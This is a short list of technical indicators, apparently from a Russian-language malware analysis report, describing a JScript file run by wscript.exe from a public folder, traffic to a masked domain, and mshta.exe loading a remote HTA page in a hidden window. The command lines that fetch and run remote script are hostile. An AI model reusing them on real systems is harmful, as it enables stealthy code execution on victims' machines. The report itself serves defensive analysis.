Техническая информация
- '<SYSTEM32>\wscript.exe' C:\Users\Public\zaim.js
- C:\users\public\zaim.js
- 'we##ar.info':443
- 'we##ar.info':443
- DNS ASK we##ar.info
- '<SYSTEM32>\wscript.exe' C:\Users\Public\zaim.js' (со скрытым окном)
- '<SYSTEM32>\mshta.exe' https://webnar.info/msgboxvbs.htm' (со скрытым окном)
- '<SYSTEM32>\mshta.exe' https://webnar.info/msgboxvbs.htm